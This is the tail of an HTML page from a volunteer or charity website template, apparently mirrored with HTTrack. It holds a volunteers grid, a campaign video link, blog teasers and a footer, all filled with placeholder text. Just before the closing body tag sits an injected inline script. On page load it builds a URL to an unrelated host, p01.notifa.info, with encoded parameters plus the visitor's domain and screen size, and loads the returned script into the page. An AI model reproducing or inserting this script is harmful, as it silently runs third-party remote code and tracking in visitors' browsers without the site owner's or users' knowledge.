                                    </div>
                                    <!-- .swiper-slide -->

                                </div>
                                <!-- .swiper-wrapper -->
                            </div>
                            <!-- .people-say-container -->
                            <div class="swiper-pagination"></div>
                        </div>
                        <!-- .people-say-section -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .people-say-overlay -->
        </section>


        <!-- End People Say Section -->


        <!-- Start our volunteers Section -->

        <section class="bg-volunteers-section">
            <div class="container">
                <div class="row">
                    <div class="volunteers-option">
                        <div class="section-header">
                            <h2>our volunteers</h2>
                            <p>Professionally mesh enterprise wide imperatives without world class paradigms.Dynamically deliver ubiquitous leadership awesome skills.</p>
                        </div>
                        <!-- .section-header -->
                        <div class="row">
                            <div class="col-md-3 col-sm-6 col-xs-6">
                                <div class="volunteers-items">
                                    <div class="volunteers-img">
                                        <img src="assets/images/home01/volunteers-img-1.jpg" alt="volunteers-img-1" class="img-responsive" />
                                    </div>
                                    <!-- .volunteers-img -->
                                    <div class="volunteers-content">
                                        <h4><a href="team_single.html">robot smith</a></h4>
                                        <p>Founder & CEO</p>
                                    </div>
                                    <!-- .volunteers-content -->
                                    <div class="volunteers-social-icon">
                                        <ul class="social-icon">
                                            <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-dribbble" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                        </ul>
                                    </div>
                                    <!-- .volunteers-social-icon -->
                                </div>
                                <!-- .volunteers-items -->
                            </div>
                            <!-- .col-md-3 -->
                            <div class="col-md-3 col-sm-6 col-xs-6">
                                <div class="volunteers-items">
                                    <div class="volunteers-img">
                                        <img src="assets/images/home01/volunteers-img-2.jpg" alt="volunteers-img-2" class="img-responsive" />
                                    </div>
                                    <!-- .volunteers-img -->
                                    <div class="volunteers-content">
                                        <h4><a href="team_single.html">JANATON DOE</a></h4>
                                        <p>Founder & CEO</p>
                                    </div>
                                    <!-- .volunteers-content -->
                                    <div class="volunteers-social-icon">
                                        <ul class="social-icon">
                                            <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-dribbble" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                        </ul>
                                    </div>
                                    <!-- .volunteers-social-icon -->
                                </div>
                                <!-- .volunteers-items -->
                            </div>
                            <!-- .col-md-3 -->
                            <div class="col-md-3 col-sm-6 col-xs-6">
                                <div class="volunteers-items">
                                    <div class="volunteers-img">
                                        <img src="assets/images/home01/volunteers-img-3.jpg" alt="volunteers-img-3" class="img-responsive" />
                                    </div>
                                    <!-- .volunteers-img -->
                                    <div class="volunteers-content">
                                        <h4><a href="team_single.html">SMITH JHONSON</a></h4>
                                        <p>Founder & CEO</p>
                                    </div>
                                    <!-- .volunteers-content -->
                                    <div class="volunteers-social-icon">
                                        <ul class="social-icon">
                                            <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-dribbble" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                        </ul>
                                    </div>
                                    <!-- .volunteers-social-icon -->
                                </div>
                                <!-- .volunteers-items -->
                            </div>
                            <!-- .col-md-3 -->
                            <div class="col-md-3 col-sm-6 col-xs-6">
                                <div class="volunteers-items">
                                    <div class="volunteers-img">
                                        <img src="assets/images/home01/volunteers-img-2.jpg" alt="volunteers-img-1" class="img-responsive" />
                                    </div>
                                    <!-- .volunteers-img -->
                                    <div class="volunteers-content">
                                        <h4><a href="team_single.html">JHON SHOW</a></h4>
                                        <p>Founder & CEO</p>
                                    </div>
                                    <!-- .volunteers-content -->
                                    <div class="volunteers-social-icon">
                                        <ul class="social-icon">
                                            <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-dribbble" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                            <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                        </ul>
                                    </div>
                                    <!-- .volunteers-social-icon -->
                                </div>
                                <!-- .volunteers-items -->
                            </div>
                            <!-- .col-md-3 -->
                        </div>
                        <!-- .row -->
                    </div>
                    <!-- .volume-option -->
                </div>
                <!-- .row -->
            </div>
            <!-- .container -->
        </section>

        <!-- End our volunteers Section -->

        <!-- Start campaian video Section -->

        <section class="bg-homebox-video">
            <div class="compaian-video-overlay">
                <div class="container">
                    <div class="row">
                        <div class="compaian-video">
                            <a href="https://www.youtube.com/embed/YTR21os8gTA" data-rel="lightcase:myCollection"><img src="assets/images/home02/video-icon.png" alt="video-icon" /></a>
                            <h3>WATCH OUR LATEST CAMPAIGN VIDEO</h3>
                        </div>
                        <!-- .compaian-video -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .compaian-video-overlay -->
        </section>

        <!-- End campaian video Section -->

        <!-- Start Blog Section -->


        <section class="bg-blog-section">
            <div class="container">
                <div class="row">
                    <div class="blog-section">
                        <div class="section-header">
                            <h2>From Our Blog</h2>
                            <p>Professionally mesh enterprise wide imperatives without world class paradigms.Dynamically deliver ubiquitous leadership awesome skills.</p>
                        </div>
                        <!-- .section-header -->
                        <div class="row">
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="blog-items">
                                    <div class="blog-img">
                                        <a href="blog_single.html"><img src="assets/images/blog/blog-img-7.jpg" alt="blog-img-7" class="img-responsive" /></a>
                                    </div>
                                    <!-- .blog-img -->
                                    <div class="blog-content-box">
                                        <div class="blog-content">
                                            <h4><a href="blog_single.html">Actualze Cententrc Staled</a></h4>
                                            <p>Completely actuaze cent centric coloration an sharing without ainstalled and base awesome event PSD Template.</p>
                                        </div>
                                        <!-- .blog-content -->
                                        <div class="meta-box">
                                            <ul class="meta-post">
                                                <li><i class="fa fa-calendar" aria-hidden="true"></i> 22.04.2017</li>
                                                <li><a href="#"><i class="fa fa-heart-o" aria-hidden="true"></i> 24 Like</a></li>
                                                <li><a href="#"><i class="fa fa-commenting-o" aria-hidden="true"></i> 24 Comment</a></li>
                                            </ul>
                                        </div>
                                        <!-- .meta-box -->
                                    </div>
                                    <!-- .blog-content-box -->
                                </div>
                                <!-- .blog-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="blog-items">
                                    <div class="blog-img">
                                        <a href="blog_single.html"><img src="assets/images/blog/blog-img-8.jpg" alt="blog-img-8" class="img-responsive" /></a>
                                    </div>
                                    <!-- .blog-img -->
                                    <div class="blog-content-box">
                                        <div class="blog-content">
                                            <h4><a href="blog_single.html">Actualze Cententrc Staled</a></h4>
                                            <p>Completely actuaze cent centric coloration an sharing without ainstalled and base awesome event PSD Template.</p>
                                        </div>
                                        <!-- .blog-content -->
                                        <div class="meta-box">
                                            <ul class="meta-post">
                                                <li><i class="fa fa-calendar" aria-hidden="true"></i> 22.04.2017</li>
                                                <li><a href="#"><i class="fa fa-heart-o" aria-hidden="true"></i> 24 Like</a></li>
                                                <li><a href="#"><i class="fa fa-commenting-o" aria-hidden="true"></i> 24 Comment</a></li>
                                            </ul>
                                        </div>
                                        <!-- .meta-box -->
                                    </div>
                                    <!-- .blog-content-box -->
                                </div>
                                <!-- .blog-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="blog-items">
                                    <div class="blog-img">
                                        <a href="blog_single.html"><img src="assets/images/blog/blog-img-9.jpg" alt="blog-img-9" class="img-responsive" /></a>
                                    </div>
                                    <!-- .blog-img -->
                                    <div class="blog-content-box">
                                        <div class="blog-content">
                                            <h4><a href="blog_single.html">Actualze Cententrc Staled</a></h4>
                                            <p>Completely actuaze cent centric coloration an sharing without ainstalled and base awesome event PSD Template.</p>
                                        </div>
                                        <!-- .blog-content -->
                                        <div class="meta-box">
                                            <ul class="meta-post">
                                                <li><i class="fa fa-calendar" aria-hidden="true"></i> 22.04.2017</li>
                                                <li><a href="#"><i class="fa fa-heart-o" aria-hidden="true"></i> 24 Like</a></li>
                                                <li><a href="#"><i class="fa fa-commenting-o" aria-hidden="true"></i> 24 Comment</a></li>
                                            </ul>
                                        </div>
                                        <!-- .meta-box -->
                                    </div>
                                    <!-- .blog-content-box -->
                                </div>
                                <!-- .blog-items -->
                            </div>
                            <!-- .col-md-4 -->
                        </div>
                        <!-- .row -->
                    </div>
                    <!-- .blog-section -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-blog-section -->
        </section>


        <!-- End Blog Section -->


        <!-- Start Footer Section -->

        <footer>
            <div class="bg-footer-top">
                <div class="container">
                    <div class="row">
                        <div class="footer-top">
                            <div class="row">
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>About us</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="widgets-content">
                                            <p>Distily enable team driven services through extensive is a relatonships platforms with interactive content. Enthusiastically scale effective.</p>
                                        </div>
                                        <!-- .widgets-content -->
                                        <div class="address-box">
                                            <ul class="address">
                                                <li>
                                                    <i class="fa fa-home" aria-hidden="true"></i>
                                                    <span>New Chokoya Road, USA.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-phone" aria-hidden="true"></i>
                                                    <span>+8801 923 970 698.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-envelope-o" aria-hidden="true"></i>
                                                    <span>Contact@admin.com</span>

                                                </li>
                                                <li>
                                                    <i class="fa fa-globe" aria-hidden="true"></i>
                                                    <span>Emai@admin.com</span>
                                                </li>
                                            </ul>
                                        </div>
                                        <!-- .address -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Latest News</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="latest-news">
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-1.jpg" alt="small-bog-img-1" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="blog_single.html">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">04 February 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-2.jpg" alt="small-bog-img-2" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="blog_single.html">Mirum est notare quam littera gothica nunc...</a></h5>
                                                    <span class="post-date">28 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-3.jpg" alt="small-bog-img-3" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="blog_single.html">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Twitter Widget</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="twitter-widget">
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Raritas etiam processus a theme dynamicus sequitur <a href="#">http://admin@gmail.com</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Duis autem vel eum <a href="#">#iriure</a>dolor in hendrerit in vulputate </h5>
                                                    <span class="post-date">8 months ago</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5><a href="#">@frankdoe</a> am liber tempor cum soluta nobis eleifend</h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Recent Photos</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="footer-instagram">
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-1.jpg" alt="footer-instagram-img-1" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-2.jpg" alt="footer-instagram-img-2" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-3.jpg" alt="footer-instagram-img-3" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-4.jpg" alt="footer-instagram-img-4" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-5.jpg" alt="footer-instagram-img-5" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-6.jpg" alt="footer-instagram-img-6" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-7.jpg" alt="footer-instagram-img-7" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-8.jpg" alt="footer-instagram-img-8" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-9.jpg" alt="footer-instagram-img-9" /></a>
                                        </div>
                                        <!-- .footer-instagram -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                            </div>
                            <!-- .row -->
                        </div>
                        <!-- .footer-top -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-top -->

            <div class="bg-footer-bottom">
                <div class="container">
                    <div class="row">
                        <div class="footer-bottom">
                            <div class="copyright-txt">
                                <p>&copy; 2017. Designer By <a href="#" title="Al-Amin(Web Designer)">LabArtisan</a></p>
                            </div>
                            <!-- .copyright-txt -->
                            <div class="social-box">
                                <ul class="social-icon-rounded">
                                    <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-google" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                </ul>
                            </div>
                            <!-- .social-box -->

                        </div>
                        <!-- .footer-bottom -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-bottom -->

        </footer>

        <!-- End Footer Section -->


        <!-- Start Scrolling -->

        <div class="scroll-img"><i class="fa fa-angle-up" aria-hidden="true"></i></div>


        <!-- End Scrolling -->

    </div>

    <!-- Start Pre-Loader-->

    <div id="loading">
        <div id="loading-center">
            <div id="loading-center-absolute">
                <div class="object" id="object_one"></div>
                <div class="object" id="object_two"></div>
                <div class="object" id="object_three"></div>
                <div class="object" id="object_four"></div>
            </div>
        </div>
    </div>


    <!-- End Pre-Loader -->




    <script type="text/javascript" src="assets/js/jquery-2.2.3.min.js"></script>
    <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.easing.1.3.js"></script>
    <script type="text/javascript" src="assets/js/jquery.waypoints.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.counterup.min.js"></script>
    <script type="text/javascript" src="assets/js/swiper.min.js"></script>
    <script type="text/javascript" src="assets/js/plugins.isotope.js"></script>
    <script type="text/javascript" src="assets/js/isotope.pkgd.min.js"></script>
    <script type="text/javascript" src="assets/js/lightcase.js"></script>
    <script type="text/javascript" src="assets/js/jquery.nstSlider.js"></script>
    <script type="text/javascript" src="assets/js/jquery.flexslider.js"></script>
    <script type="text/javascript" src="assets/js/custom.isotope.js"></script>
    <script type="text/javascript" src="assets/js/custom.map.js"></script>

    <script type="text/javascript" src="assets/js/custom.js"></script>


<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2DxIKXzSOYDZ3mGZAugvoRcl0AgMIrBdStjq0FOCWfsZcNaGDE0pg2Zk1CIvizP7zVfnQ9%2bdcNMkednHaKy%2bE4lMh0e8U2HWKeUsg0wa5qVY%2fK4QaXtsVwRT%2fiyRADkQfvY%2farRoeS%2bpydkm0LbHHc57P4p81aJpNYAStmcGkZLRXX3qVNfP7sUG4OZqsIcAiD425%2f0BvLa12SkXzfixZtaAgxJUo108EJsewgmiRBk1xDm30Sb4LkOJUJRr%2bvTK5USFeqP1%2fPyFfkfFa09%2fa91xBN%2f801WSVh5%2fKu1M03hKau16vvEDO5IXit64H9NjyCEJOYlW4kyNGsOtzLCeQJcOAcISlRy3vN3h8qoPtEtJp6SY9UtSACbgu8DpC7hMNcmCitL6MfoGxsoyYa0y9wUlHckEuLG1e7PkHYr5N37vacvnIswocopDYLpPpninKkaRUiDaclo%2bqKV5I9SfaTQbrGbRzFka6R31EWYnuEpFaC1C5XruqhMXi6qarl0RuXgAsBYmeWMA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/home_box.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:16:48 GMT -->
</html>
